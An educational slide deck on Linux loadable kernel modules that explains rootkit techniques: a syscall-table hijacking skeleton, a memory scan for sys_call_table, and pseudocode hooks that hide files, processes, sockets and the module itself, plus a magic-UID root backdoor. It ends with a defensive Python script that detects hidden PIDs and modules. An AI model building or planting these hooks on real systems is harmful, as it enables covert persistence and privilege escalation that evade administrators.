Fun With LKMs


Fun with Linux Loadable Kernel Modules (LKMs):

Biswajit Paul & Dinakara K
{ biswajit, dinu } @cair.res.in
Scientist, CAIR (DRDO), Bangalore, INDIA

Motivation : 

Fig: Three phases of a typical cyber attack: Information Gathering, Attack Launching, Retaining Access.

What the attacker wants from the system once in:
- Hide my files & directories
- Do not show my program in the list of running processes
- Hide socket connections opened by me
- Do not update the 'modify time' stamp of a file replaced by me
- Always give me root privilege
- Root login without password
- Gather all passwords used over the network

One of the ways of achieving these is using LKM.

Overview: 

PART I: Introduction to LKM
PART II: Hacking using LKM

PART I: Introduction to LKM

Module Basics: 

Linux Loadable Kernel Modules (LKMs) is a framework that allows one to add or remove code, on the fly, in the running kernel.

Why this framework? Most systems do not use all kernel functions all the time. Loadable modules allow rarely used kernel functions to be loaded and unloaded as and when required, e.g. device drivers.

Advantages: smaller than a monolithic kernel, so it saves kernel memory; the kernel can be modified on the fly without recompiling it.

A sample LKM: 

A minimal module using the 2.4-style entry points init_module/cleanup_module:

    #include <linux/module.h>
    #include <linux/kernel.h>

    int init_module(void) {            /* Use for all initialization */
        printk(KERN_INFO "\n The LKM is loaded\n");
        return 0;
    }

    void cleanup_module(void) {        /* Use for clean shutdown */
        printk(KERN_INFO "\n The LKM is removed \n");
    }

Compile:

    gcc -D__KERNEL__ -DMODULE -c -Wall -I/usr/src/linux/include lkm.c

Useful Macros & admin utilities:

Macros:

    MODULE_AUTHOR("Biswajit and Dinakara");
    MODULE_DESCRIPTION("Test LKM");
    MODULE_LICENSE("GPL");
    MODULE_PARM(param_1, "i");     /* 2.4-style: declare module parameter param_1 as an int */
    EXPORT_SYMBOL(symbol_1);       /* make symbol_1 visible to other modules */

Admin utilities:

    Insert : insmod <module_name.o>
    Remove : rmmod <module_name>
    View   : lsmod

PART II: Hacking Using LKM

How LKM is exploited?:

Fig: user-space utilities (ls, ps, netstat, su, ...) -> system call (SYS_stat, SYS_getuid, ...) -> sys_call_table -> (1) original system call handler or (2) new system call handler

One of the ways of exploiting LKM is system call replacement.

System Call Replacement: 

Skeleton of a replacement module (placeholders in angle brackets and "SYSCALL NO" are to be filled in):

    #include <linux/module.h>
    #include <linux/kernel.h>
    #include <sys/syscall.h>

    int *sys_call_table = <address of sys_call_table>;
    int (*org_syscall)(arg1, arg2, ...);

    int new_syscall(arg1, arg2, ...) {
        /* Manipulate here */
        return 0;
    }

    int init_module(void) {
        org_syscall = sys_call_table[SYSCALL NO];   /* save the original handler */
        sys_call_table[SYSCALL NO] = new_syscall;   /* install the replacement */
        return 0;
    }

    void cleanup_module(void) {
        sys_call_table[SYSCALL NO] = org_syscall;   /* restore on unload */
    }

Issues in resolving "sys_call_table" symbol:

I.  If it is exported (kernel < 2.4.18):
        cat /proc/ksyms | egrep sys_call_table
    and let insmod resolve the symbol while loading.

II. If /boot/System.map is available:
        cat /boot/System.map | egrep sys_call_table
    and hardcode the address found.

III. Otherwise, scan from the exported symbol system_utsname for a table whose __NR_read entry is sys_read (fragment: i, flag and sys_table are declared earlier):

        sys_table = (unsigned long *)&system_utsname;
        while (i) {
            if (sys_table[__NR_read] == (unsigned long)sys_read) {
                sys_call_table = sys_table;
                flag = 1;
                break;
            }
            i--;
            sys_table++;
        }

Hack 1: Hiding File Name: 

System call to be replaced: sys_getdents

    int new_sys_getdents(unsigned int fd, struct dirent *dirp, unsigned int cnt) {
        /* Pseudo code */
        if (dirp->d_name matches "hide_file")
            return 0;
        else
            call original sys_getdents;
        return 0;
    }

Hack 2: Hiding Full File Contents: 

System call to be replaced: sys_open

    int new_sys_open(const char *pathname, int flag, mode_t mode) {
        /* Pseudo code */
        if (pathname matches "hide_file")
            return 0;
        else
            call original sys_open;
        return 0;
    }

Hack 3: Filtering data while writing into File: 

System call to be replaced: sys_write

    int new_sys_write(unsigned int fd, char *buf, unsigned int count) {
        /* Pseudo code */
        if (buf matches "pattern")
            return 0;
        else
            call original sys_write;
        return 0;
    }

Hack 4: Avoid any file ownership Check: 

System call to be replaced: sys_getuid

    int new_sys_getuid(uid_t uid) {
        /* Pseudo code */
        if (uid == MAGICUID) {
            current->uid = 0; current->euid = 0;   /* superuser */
            current->gid = 0; current->egid = 0;
            return 0;
        } else
            call original sys_getuid;
        return 0;
    }

Hack 5: Process Hiding: 

System call to be replaced: sys_getdents

    /* Pseudo code */
    Scan the task structures to get the PID from the process name.
    Hide the directory corresponding to that PID in /proc.

Hack 6: Hiding Open Socket Connection: 

System call to be replaced: none

    /* Pseudo code */
    Go to the /proc/net/tcp file.
    Modify the seq_show field of the tcp_seq_afinfo structure.

Hack 7: Hiding our LKM:

System call to be replaced: sys_init_module

    int new_init_module() {
        /* Pseudo code */
        register struct module *mp asm("%ebp");
        *(char *)mp->name = 0;   /* blank the module name shown by lsmod */
        mp->size = 0;
        mp->ref = 0;
    }
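Hacks 1, 5 and 7 all work by filtering one view of the system (the getdents listing that ls and ps rely on, or the module list lsmod prints), so a defender's check compares that view against one reached by a different path. The script below is an added example, not part of the presentation: hidden_pids() stats /proc/<pid> for every possible PID and reports those absent from the directory listing, and hidden_modules() compares /proc/modules with the live entries under /sys/module (present on 2.6 and later kernels, not the 2.4 kernels the slides target). The listdir parameter that stands in for a hooked listing, and the constructed fixture tree, are assumptions of this example.

```python
import os
import tempfile

def _pid_max(proc_root):
    """Probe bound from <proc>/sys/kernel/pid_max; classic default if absent."""
    try:
        with open(os.path.join(proc_root, "sys", "kernel", "pid_max")) as f:
            return int(f.read())
    except (OSError, ValueError):
        return 32768

def hidden_pids(proc_root="/proc", listdir=os.listdir):
    """PIDs whose /proc/<pid> directory can be stat()ed but is missing from the
    listing: a getdents hook filters what ps sees, stat() takes another path."""
    listed = {int(n) for n in listdir(proc_root) if n.isdigit()}
    probed = {pid for pid in range(1, _pid_max(proc_root))
              if os.path.isdir(os.path.join(proc_root, str(pid)))}
    return sorted(probed - listed)

def hidden_modules(proc_modules="/proc/modules", sys_module="/sys/module"):
    """Modules with a live sysfs entry (an initstate file) that are absent
    from /proc/modules, the list that lsmod prints."""
    with open(proc_modules) as f:
        listed = {line.split()[0] for line in f if line.strip()}
    live = {n for n in os.listdir(sys_module)
            if os.path.exists(os.path.join(sys_module, n, "initstate"))}
    return sorted(live - listed)

def make_sample_tree():
    """Constructed fixture (not a real system): a fake /proc with PIDs 1, 42
    and 4711, and a fake sysfs where 'ghost_mod' is live but unlisted."""
    root = tempfile.mkdtemp()
    proc, sysm = os.path.join(root, "proc"), os.path.join(root, "sys_module")
    for pid in ("1", "42", "4711", "self"):
        os.makedirs(os.path.join(proc, pid))
    for mod in ("ext4", "xfs", "ghost_mod"):
        os.makedirs(os.path.join(sysm, mod))
        open(os.path.join(sysm, mod, "initstate"), "w").close()
    os.makedirs(os.path.join(sysm, "builtin_only"))  # no initstate: built-in
    mods = os.path.join(root, "modules")
    with open(mods, "w") as f:
        f.write("ext4 1 0 - Live 0x0\nxfs 1 0 - Live 0x0\n")
    return proc, mods, sysm

if __name__ == "__main__":
    proc, mods, sysm = make_sample_tree()
    # Simulated getdents hook: the listing omits PID 4711.
    print(hidden_pids(proc, lambda p: ["1", "42", "self"]))  # [4711]
    print(hidden_modules(mods, sysm))                         # ['ghost_mod']
```

On a live host call both functions with their defaults; a short-lived process that exits between the listing and the probe can show up as a false positive, so re-run before acting on a result.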

Thank You:

Biswajit Paul & Dinakara K
{ biswajit, dinu } @cair.res.in